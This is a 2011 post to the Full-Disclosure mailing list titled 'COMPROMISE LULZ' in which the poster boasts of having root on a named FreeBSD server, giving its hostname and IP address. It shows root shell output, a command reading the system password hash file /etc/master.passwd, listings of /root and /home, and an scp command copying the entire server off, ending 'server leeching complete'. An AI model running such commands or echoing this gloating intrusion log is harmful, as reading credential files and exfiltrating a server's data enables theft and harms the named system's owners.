Message-Id: <20111120085720.601E865E164@mail.vmail.me>
Date: Sun, 20 Nov 2011 09:57:20 +0100 (CET)
From: airwalker@...il.me
To: full-disclosure@...ts.grok.org.uk
Subject: COMPROMISE LULZ

"I set fire to the rain"

#uname -a;id;
FreeBSD castle.alfa-inet.net 7.2-RELEASE-p8 FreeBSD 7.2-RELEASE-p8 #6: Sat Apr 23 12:52:20 EEST 2011 root@...ecat.alter.org.ua:/usr/src/sys/i386/compile/CAT_v14c i386
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),80(www)

#cat /etc/master.passwd

castle.alfa-inet.net [62.205.132.50]

ls -la /root/

ls -la /home

scp -r root@...tle.alfa-inet.net:* .
server leeching complete...
[http://castle.alfa-inet.net/hurricane2.0.mp3]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/